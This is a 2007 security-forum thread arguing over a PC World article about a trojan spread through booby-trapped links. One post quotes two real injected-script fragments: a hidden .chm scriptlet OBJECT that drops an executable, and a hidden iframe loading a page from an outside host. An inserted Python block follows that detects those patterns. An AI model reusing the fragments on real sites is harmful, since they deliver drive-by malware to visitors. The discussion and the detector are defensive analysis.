Get infected with a rootkit trojan just by clicking on a link in a forum!

Discussion in 'other security issues & news' started by AlamoCity, May 5, 2007.

Thread Status:
Not open for further replies.
  1. AlamoCity (Registered Member)

    The title of this thread sounds pretty absurd, right? But that's basically what the following article is saying: http://www.pcworld.com/article/id,129431-page,1-c,trojanhorses/article.html

    As it makes the ridiculously broad statement that "Anyone clicking on the link will only find their system infected."

    Hasn't the author ever heard of anti-virus/anti-trojan programs? Not to mention firewalls, the FireFox browser, and many other miscellaneous security related programs?? Why would a reputable company like PC World destroy their credibility by publishing an article with such a nonsensical statement?

    Because it will mislead tens of thousands of 'security newbies', and make them afraid to click on any link. Please post your opinion on this article, as I'm curious what other Wilder's users think about it.
  2. bigc73542 (Retired Moderator)

    I think you are reading more into this than is there. They seem to be telling what the malware is and what can happen not what is going to necessarily happen.
  3. AlamoCity (Registered Member)

    You know that, and I know that, but my point is that tens of thousands of 'security newbies' won't know it. Also, the article doesn't even give a hint about what vulnerabilities need to be present in order to be infected.

    For example, do you have to be using the IE browser with ActiveX enabled? Or can you be infected merely by having javascript enabled on your FireFox browser? In other words, it's illogical to simply tell people what can happen in the worst case scenario. Thus newbies will be more likely to accept the statement at face value, and will stop clicking on links in forums, etc.
  4. Mrkvonic (Linux Systems Expert)

    Hello,
    My answer to this is: Experts say ... on my website.
    Mrk
  5. Escalader (Registered Member)

    Hi Mrk:

    Can't click your link cause PC world scared me! :rolleyes:
  6. Mrkvonic (Linux Systems Expert)

    Hello,

    There is a fair chance nothing bad will happen.
    But as Heisenberg proved, you can never know for sure, always a shred of uncertainty. Go ahead and read, will only do you good...

    Regarding the article: pure fear-mongering for controlling the masses. Just like any other sort of propaganda, including political.

    Mrk
  7. elio (Registered Member)

    Have you seen this link?

    Have you seen this link?

    ~Direct download removed - Provide a url to the page containing the info instead - Ron ~
    Last edited by a moderator: May 6, 2007
  8. lodore (Registered Member)

    Yes, it's caused by using IE with unsigned ActiveX controls allowed automatically. :D
    So to stop the risk, use an alternate browser such as Opera or Firefox to reduce the risk.
    lodore
  9. elio (Registered Member)

    Have you seen this link to the link?

    Have you seen this link to the link?
    Link to link to video

    (sorry Ron, I didn't know the "no direct downloads" policy)
  10. TonyW (Registered Member)

    It isn't that nonsensical when you consider the many people out there who aren't adequately protected by at least one or more of the type of programs you mention. If they do click on the links and aren't protected, they are in danger of being infected in the manner described.
  11. Mele20 (Former Poster)

    The article states:

    "An initial infection is still carried out via e-mail, which touts a link that when clicked downloads a number of malware components to a victimized machine."

    That is a world of difference from you saying the article says clicking on a link in a forum will get you a rootkit.

    No sane user ever clicks on a link in email. So, this is a minor thing. Email should always be read in Plain Text, and never click on a link, never open an attachment even if expecting it without first confirming with the party that they did in fact send an email with an attachment at such and such a time, and even then ALWAYS download the attachment to disk and scan before opening. If newbies don't want to practice safe computing, I don't have much sympathy for them. If you practice safe computing you won't get the initial crap needed for this particular exploit to work.
  12. 19monty64 (Registered Member)

    Not wanting to practice safe computing is a lot different than not knowing the rules of safe computing!!! As a parent I don't blame my kids for what they don't know, but rather myself for not teaching them. My daughters practice "safe-surfing" but they have lots of stories of what happened to so-and-so's pc (and what it cost their parents to fix.) The sad part is, their school's computers are in no better shape as even the "educators" have no idea of how to back up important files, let alone what safe computing is all about.
  13. AlamoCity (Registered Member)

    I agree with you. Many people don't use an anti-virus program at all. I didn't use one myself for at least a year, and my only security was a software firewall. So it's possible that I could have been infected with this trojan simply by having javascript enabled on my Firefox browser.

    As the author of the article didn't think it was important to provide any details about what vulnerabilities need to be in place to get infected. And PC World apparently wanted to scare their readers so people like me would make an issue about it, and thus get more traffic to their site to see their ads. :)

    But I still think the statement is nonsensical when applied to "everyone", given the large percentage of people who are adequately protected. Because the way the article is written, readers could easily assume that it's a new exploit that no one can protect themselves against. For example, the statement implies:

    1) It's not necessary to be using Internet Explorer/ActiveX to get infected. All it takes is to have javascript enabled on a 'safe' browser like Firefox.

    2) Anti-virus/anti-trojan programs can't detect it because the trojan is cleverly programmed to utilize javascript to automatically change its 'signature' every time the compromised web page is opened.
  14. AlamoCity (Registered Member)

    What I said is accurate. You misunderstood the article. The email exploit is how the trojan author 'recruits' unsuspecting people to help spread the trojan via forums, etc.

    For example, if you were infected, the "malware components" that had been installed on your hard drive would automatically include the 'booby trapped' link in your forum posts.

    Thus readers would assume you included the link as part of your posts. And they would be infected with the rootkit merely by clicking on the link, depending on what vulnerabilities need to be in place.

    Then there are a lot of insane people who are not in mental hospitals. :)
  15. Mrkvonic (Linux Systems Expert)

    Prove it.
    Mrk
  16. AlamoCity (Registered Member)

    You misunderstood. I was not stating that as being factual, it was intended only as an example of what the author of the article implied by making the broad statement that "Anyone clicking on the link will only find their system infected." Which is why I put the following above it: "For example, the statement implies:"

    :D
  17. Mele20 (Former Poster)

    That article states that to get infected you have to click on the email link. Getting infected involves first clicking on the email link. That has nothing to do with scripts in Firefox. To get infected via the forum link requires that you first have the necessary files on your computer from the email link. That is what the author wrote in the article. If you click on the link from the forum AND YOU HAVE THE NECESSARY FILES ON YOUR COMPUTER FROM THE EMAIL LINK THEN YOU GET INFECTED. If you don't have the necessary files, then clicking on the forum link does nothing. This is an email exploit in two stages. That is what the article states. Now whether or not that is true or false, I don't know because I have not personally tested it.
  18. Rmus (Exploit Analyst)

    Did we read the same article? I don't see the following words/phrases that you mention:

    -------------------------------
    ActiveX
    'safe' browser
    Firefox
    signature
    javascript
    the trojan is cleverly programmed
    --------------------------------

    Isn't stating that they are "implied" jumping to a conclusion?

    However, to take the 'javascript' thingy which you mention - and it comes up often: I'll echo Mrk, and ask for examples in the wild.

    Looking at recent ones, all of the javascript code launches exploits particular to IE, and I've never found one to work in Opera (and I would assume Firefox).

    1) BellSouth Support Page

    Code:
    <SCRIPT language=JavaScript>
     document.write( '<OBJECT Width = 0 Height = 0 style="display:none;" 
    type ="text/x-scriptlet" data="' + mhStr + url + '/[b]test.chm::/test.htm[/b]"></OBJECT>');
     window.status = " ";
    </SCRIPT>
    
    ....snip....
    
    $WWKeywordLinks/Property½M /newproject.hhc
    {newproject.hhk¨|‚"/test.exe…  /test.htm
    
    The IE chm file exploit remotely downloads the payload: here, test.htm/test.exe by displaying the HTML Help box:

    http://www.urs2.net/rsj/computing/imgs/chm-alert2.gif
    ___________________________________________________________________________________________

    2) Miami Dolphin Site

    A screenshot of the site and page source code is here:

    http://www.websense.com/securitylabs/alerts/alert.php?AlertID=733

    The cached 3.js file contains the old iframe vulnerability

    Code:
    document.write("<iframe ... src='http://www.zj5173.com/1.htm'></iframe>")
    
    Does anyone know of examples - not PoC - that would run in Opera or FireFox?

    The article states,
    Scare tactics as some have stated? Maybe a bit strong, but certainly fits with the type of reporting in much of the security "journalism," so-called. It leads the reader to assume that these things will occur, as if there is nothing to prevent them.

    Again from the article:
    Well, that's nice, but a missed opportunity to remind readers that even in cases of the inadvertent click, there are many ways of preventing what would seem to be the inevitable, as you well point out in your first post.

    Finally,

    Here you are right on the mark, so if the article doesn't offer any solutions, how do the 'newbies' (I think we need a different description) learn of solutions?


    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier
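The two in-the-wild cases above (a hidden OBJECT of type text/x-scriptlet pointing into a .chm file, and a hidden iframe written from a cached .js file) share a few markup traits a defender can flag when reviewing page source or web proxy captures. The following is an added example, not code from the post or from the sites it references; the samples are constructed from the patterns described above, the hostname is a placeholder, and the rules are heuristics, so treat a hit as something to investigate rather than proof of compromise.

```python
from __future__ import annotations
import re

# Constructed sample page sources modelled on the two cases discussed in the post:
# a .chm scriptlet OBJECT assembled in document.write(), and a zero-size iframe
# injected from a cached .js file. "malicious.example" is a placeholder host.
SAMPLES = {
    "chm_scriptlet": """<SCRIPT language=JavaScript>
 document.write( '<OBJECT Width = 0 Height = 0 style="display:none;" type ="text/x-scriptlet" data="' + mhStr + url + '/test.chm::/test.htm"></OBJECT>');
 window.status = " ";
</SCRIPT>""",
    "hidden_iframe": "document.write(\"<iframe width=0 height=0 src='http://malicious.example/1.htm'></iframe>\")",
    "benign": "<p>Welcome to the support page.</p><script>window.status = 'ready';</script>",
}

# Each rule: (name, compiled pattern, why a reviewer should care).
RULES = [
    ("chm_scriptlet_object",
     re.compile(r"type\s*=\s*[\"']text/x-scriptlet[\"'][^>]*\.chm::", re.I | re.S),
     "OBJECT of type text/x-scriptlet whose data points inside a .chm (HTML Help) file"),
    ("zero_size_iframe",
     re.compile(r"<iframe[^>]*\b(?:width|height)\s*=\s*[\"']?0\b[^>]*>", re.I),
     "iframe with zero width or height, used to load another page without showing it"),
    ("hidden_object",
     re.compile(r"<object[^>]*display\s*:\s*none[^>]*>", re.I),
     "OBJECT element hidden with display:none"),
    ("docwrite_markup",
     re.compile(r"document\.write\s*\(\s*[\"'][^\"']*<(?:iframe|object)", re.I),
     "iframe/object markup assembled inside document.write(), hiding it from a plain HTML view"),
]


def scan_source(source: str) -> list[str]:
    """Return the names of every rule that matches the given page source, in rule order."""
    return [name for name, pattern, _ in RULES if pattern.search(source)]


def scan_all(samples: dict[str, str]) -> dict[str, list[str]]:
    """Scan a mapping of label -> page source and report findings per label."""
    return {label: scan_source(src) for label, src in samples.items()}


if __name__ == "__main__":
    reasons = {name: why for name, _, why in RULES}
    for label, hits in scan_all(SAMPLES).items():
        print(f"{label}: {'no findings' if not hits else ''}")
        for hit in hits:
            print(f"  - {hit}: {reasons[hit]}")
```

Running the block flags the .chm sample on three rules and the iframe sample on two, while the benign page produces no findings.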
  19. AlamoCity (Registered Member)

    You're still misunderstanding the article, as what you say above is 100% wrong. The article states:

    "An initial infection is still carried out via e-mail, which touts a link that when clicked downloads a number of malware components to a victimized machine. Once on a PC, however, the malicious code injects itself into the network stack as a rootkit and analyzes all outbound Web traffic."

    Why would you think you've got to click on a second link, in a forum, etc., in order to get infected? As according to the above paragraph, you've already been nailed when you click on the link in the email. As the above paragraph spells out that your computer is injected with a rootkit trojan, period.

    And if you can get infected with a rootkit trojan merely by clicking on a link in an html email, why would you think you can't get infected by clicking on a link in an html web page, if you don't have an anti-virus program that can stop it?

    I think you're being confused by the article saying "An initial infection". What that means is the email exploit is how the trojan writer 'recruits' unsuspecting victims to help spread the trojan via forums, etc., which is what I told you in my last post.

    Again, once you're infected by clicking on the link in the email, the trojan author uses your computer to pass on the infection by automatically including the 'booby trapped' link in your forum posts:

    "It has hooks for boards, e-mail, and blogs," said Alperovitch. When a user on an infected PC posts a message to a forum or blog, or sends a message via popular Web-based mail services such as Hotmail, Gmail, and Yahoo Mail the Trojan adds text to the entry or message.

    "It inserts 'Have you seen this link?' along with a link to what seems to be a video," Alperovitch said. Anyone clicking on the link will only find their system infected."

    Yes, "this is an email exploit in two stages", but victims are infected with the trojan in each stage. The email stage is, again, to recruit unsuspecting victims to help spread the trojan via forums, etc. But whether you're infected by clicking on an email or web page link, your computer is then 'owned' by the trojan writer. In the sense that he adds you to his army of hijacked computers to use for DOS attacks, spamming, etc.

    Snap out of your denial! :D Again, it doesn't take two stages to get infected! You can open your email in plain text all day, every day, but it won't do you any good if you click on the wrong link on a web page. (Depending on the vulnerabilities that need to be in place in order to be infected.) Get Snoopfree, as that's excellent for detecting hooks.
  20. Rmus (Exploit Analyst)

    Why bother continuing arguing in support of the silly blather opined by the author? Just because that happens to some people, doesn't mean it's a given. To add to his discussion is no better than the author presenting his original assertion, as you rightfully state in your original post:

    In a security forum, this type of article should be immediately countered with arguments explaining how it's nigh impossible for remote code execution to drop its payload, when proper security measures are in place, followed by some discussion as to those methods.

    That puts a stop to this silly propaganda, which will continue as long as readers oooh and aaah and shudder at such pronouncements, unaware that proper security nullifies such stuff.

    regards,

    -rich

  21. AlamoCity (Registered Member)

    The reason you don't see the following two quotes in the article is because they aren't in the article:

    1) "It's not necessary to be using Internet Explorer/ActiveX to get infected. All it takes is to have javascript enabled on a 'safe' browser like Firefox.

    2) Anti-virus/anti-trojan programs can't detect it because the trojan is cleverly programmed to utilize javascript to automatically change its 'signature' every time the compromised web page is opened."

    I wrote them. I conjured them up out of my own brain. As I told Mrkvonic in response to his post, they are intended only as an example of what the author of the article implied (in my opinion) by making the extremely broad statement that "Anyone clicking on the link will only find their system infected." Which is why I put the following above the quotes in my original post: "For example, the statement implies:"

    I had no idea they would cause confusion, or that people wouldn't read "For example, the statement implies", which would have avoided the confusion. Now I know better! :D

    Not as far as I'm concerned, but again, that's just my opinion. By making the statement that "Anyone clicking on the link will only find their system infected", the author could mean anything. Which could obviously include the examples I listed above, which caused the confusion.

    Again, the "javascript' thingy" was just an example I used off the top of my head. I have no idea how the exploit works. It probably depends on the victims using Outlook to be infected by email, and Internet Explorer to be infected by web pages. But that's just a guess. Maybe Mele20 will do some research on it and report back to this thread, once he/she snaps out of the denial stage. :D
  22. Rmus (Exploit Analyst)

    I understand that, but in light of your first statement...
    ... I don't understand why you would amplify on it, and imply anything that would tend to make unaware readers more unsure of things than they are.

    Why yell "Fire" when there is no fire :)


    regards,

    -rich
  23. Rmus (Exploit Analyst)

    PC World certainly reaches a widely diversified readership, from those just starting out in security, to those more experienced.

    For the first group, the scenarios it suggests are bound to instill fear, to say the least, because they offer no real solutions, save "don't click on the email."

    For the second group - the more experienced - without posting any code, the reader is given nothing to analyze.

    If I were writing the article, I would use the first two paragraphs as is, and change the third with added words in bold:

    Then, would follow discussion of some solutions. Since the article uses "Storm" as an example, I would end with a link to the write-up at sans.org, and include the following quote:

    http://isc.sans.org/diary.html?storyid=2618
    I would omit the doomsday pronouncements.

    The part of the article about hooks and stuff is worthless without further analysis - best left to a security site like WebSense or Sophos, unless the PC editors would permit a longer article which would include detection techniques.

    On my scale of 1 - 5, it rates a "0" since it doesn't even weigh in, and should not have gotten past the editor's desk in its present form.

    regards,

    -rich

  24. AlamoCity (Registered Member)

    Because I assumed that people using Wilders Security Forums are more knowledgeable about exploits than the average person reading the article on the PC World site. And thus they would immediately comprehend the point I was trying to make in my response to TonyW:

    "But I still think the statement is nonsensical when applied to "everyone", given the large percentage of people who are adequately protected. Because the way the article is written, readers could easily assume that it's a new exploit that no one can protect themselves against. For example, the statement implies:"

    I still think they were appropriate examples to use, given the extremely broad statement the author made: "Anyone clicking on the link will only find their system infected."

    But you're assuming there is no fire. :) For all we know, the author could be correct, and anyone could be infected by clicking on a web page link. This would mean that your antivirus program won't help you, and you're vulnerable even while using Firefox. :)
  25. elio (Registered Member)

    Re: Have you seen this link to the link?

    OK, this was obviously a joke about the vector for this supposed infection.
    And I think everybody here agrees that with a safe up-to-date browser, safe up-to-date plugins (QuickTime+Java vuln anyone?), safe up-to-date OS (.ANI cursor vuln anyone?) and up-to-date virus signatures, getting infected by clicking a link is quite unlikely (0 days anyone?)

    But did anybody actually follow my link above and watch the video?
    It's quite enjoyable, Billy Hoffman is a funny guy.

    Even if we couldn't get our local system owned by a link, we probably have valuable properties online.
    And if we've got none yet, that's gonna quickly change as governments, banks and major businesses are moving a large part of their activities to the web.
    One day we may even find ourselves using one of those evil Google applications to process sensitive data.

    According to RSnake, 80% of web sites are vulnerable to XSS and 99% users have JavaScript enabled.
    It sounds scary, because it means our identities and other valuable information (even money) tied to those sites can be leaked if we click on the wrong link.

    Is there anything you, as security experts, suggest to protect ourselves from this?